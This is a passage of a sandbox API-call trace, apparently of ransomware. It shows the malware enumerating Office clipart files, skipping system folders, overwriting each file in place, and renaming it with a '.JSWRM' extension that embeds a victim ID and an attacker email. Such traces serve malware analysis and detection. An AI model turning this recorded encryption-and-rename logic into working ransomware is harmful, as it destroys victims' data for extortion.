(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0098.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0098.942] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0098.942] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0098.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0098.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0098.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0098.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0098.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0098.943] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0098.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0098.943] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0098.943] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00178_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00178_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00178_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00178_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0098.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0098.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0098.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0098.944] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00232_.WMF", cAlternateFileName="")) returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2=".") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="..") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="...") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="windows") returned -1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="recovery") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="perflogs") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="documents and settings") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="system volume information") returned 1 [0098.944] lstrcmpiW (lpString1="TR00232_.WMF", lpString2="msocache") returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0098.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00232_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00232_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00232_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0098.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00232_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0098.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00232_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00232_.WMF", lpUsedDefaultChar=0x0) returned 12 [0098.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0098.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0098.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0098.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0098.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0098.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0098.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00232_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00232_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0098.946] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27840) returned 1 [0098.946] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.946] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6cc0) returned 0x24d210 [0098.946] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6cc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6cc0, lpOverlapped=0x0) returned 1 [0099.023] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.023] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6cc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6cc0, lpOverlapped=0x0) returned 1 [0099.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.028] CloseHandle (hObject=0x314) returned 1 [0099.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0099.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0099.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0099.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0099.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0099.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0099.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.031] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00232_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00232_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00232_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00232_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0099.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0099.058] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0099.058] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c4a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00233_.WMF", cAlternateFileName="")) returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2=".") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="..") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="...") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="windows") returned -1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="recovery") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="perflogs") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="documents and settings") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="system volume information") returned 1 [0099.058] lstrcmpiW (lpString1="TR00233_.WMF", lpString2="msocache") returned 1 [0099.058] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.058] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00233_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00233_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00233_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0099.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00233_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00233_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00233_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0099.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0099.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0099.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.060] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31818) returned 1 [0099.060] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.060] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7c40) returned 0x24d210 [0099.061] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7c40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7c40, lpOverlapped=0x0) returned 1 [0099.179] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.179] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7c40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7c40, lpOverlapped=0x0) returned 1 [0099.179] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.180] CloseHandle (hObject=0x314) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0099.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0099.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0099.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0099.180] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0099.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0099.180] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00233_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00233_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00233_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0099.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0099.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0099.182] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00402_.WMF", cAlternateFileName="")) returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2=".") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="..") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="...") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="windows") returned -1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="recovery") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="perflogs") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="documents and settings") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="system volume information") returned 1 [0099.182] lstrcmpiW (lpString1="TR00402_.WMF", lpString2="msocache") returned 1 [0099.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0099.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00402_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00402_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00402_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0099.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00402_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00402_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00402_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0099.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0099.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00402_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00402_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.184] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2272) returned 1 [0099.184] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.184] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e0) returned 0x20c6c0 [0099.184] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8e0, lpOverlapped=0x0) returned 1 [0099.185] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.185] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8e0, lpOverlapped=0x0) returned 1 [0099.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0099.186] CloseHandle (hObject=0x314) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0099.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0099.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0099.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0099.186] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0099.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0099.186] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.186] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00402_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00402_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00402_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00402_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.187] HeapFree (in: hHeap=0x1e0000, 